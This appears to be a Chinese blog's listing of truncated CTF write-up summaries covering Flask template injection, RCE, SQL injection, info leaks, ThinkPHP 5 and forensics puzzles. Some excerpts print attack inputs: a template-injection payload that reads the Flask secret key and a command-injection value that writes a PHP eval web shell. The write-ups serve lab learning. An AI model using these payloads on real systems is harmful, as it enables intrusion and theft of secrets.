摘要:
用wapalzyer查看网页指纹,发现使用flask框架2.3.6 键入{{7*7}},点击预览 计算了结果,表达式被执行了。 因此我们可以利用这个漏洞执行代码 抓包查看,发现参数名为text,内容是URL编码 /?text= {{config.SECRET_KEY}},URL编码%7b%7b%63 阅读全文
摘要:
CTFHUB部分 可以参考这位大佬做的入门题目视频,过程很详细 CTF-Web入门教程:RCE_哔哩哔哩_bilibili RCE eval(命令执行) 第一题使用蚁剑根据题目提示需要cmd,连接密码写cmd,测试连接成功,好,发现打不开库,看看其它办法 $_REQUESTPHP $_POST 变量 阅读全文
摘要:
HTTP 这篇随笔参考了很多这位大佬的文章,我写的也不如这位大佬详细,而且图片上传总是失败,建议各位看看这位大佬的文章 CTFHub题解-技能树-Web-Web前置技能-HTTP协议【请求方式、302跳转、cookie、基础认证、响应包源代码】 - 0yst3r - 博客园 (cnblogs.com 阅读全文
摘要:
SQL注入(一)—— sql手动注入实操-CSDN博客 SQL-1 判断注入点 —— 第一步 找页面与数据库产生交互的地方。 我们找到界面中的 url : http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1 1 这一长串url中 ’ ? ’ 阅读全文
摘要:
RCE-0 https://blog.csdn.net/weixin_48799157/article/details/123800145在这里输入127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > 555.php创建文件555.php并输入一 阅读全文
摘要:
目录遍历 参考博客: CTFHub技能树 Web-信息泄露 详解_bugscanteam_ErYao7的博客-CSDN博客 emmm,几个目录都点一点 PHPinfo 在phpinfo中直接查看flag,找不到就CTRL+F搜索 备份文件下载 网站源码 当开发人员在线上环境中对源代码进行了备份操作, 阅读全文
摘要:
御林 [Hard-]是的,这是一份礼物 信息中心 阅读全文
摘要:
只做了第一个其他的不会(挨打 best language (Think PHP V5) think php V5 攻防世界这道题,考察的是thinkphp V5的漏洞,接下来我详细介绍一下thinkphp V5这个漏洞。 ThinkPHP 5漏洞简介ThinkPHP官方2018年12月9日发布重要的 阅读全文
摘要:
这个题以我的水平应该只够恢复图片,好吧恢复图片也不一定搞得来 恢复图片 16进制打开文件在文件末尾有一段python代码 复制到一个新建py文件中 缺少PIL库 在windows环境下安装PIL(也可以叫做Pillow)_windows下载pillow-CSDN博客 虽然我下载到那个文件了但是我还是 阅读全文
摘要:
绝对音感 观察波形频谱没什么信息,ultraEdit打开发现文件尾部有信息,这里的思路来源于之前图片马的文件合并 Cltr+F直接找第一个Y字符 Yulinsec{} 阅读全文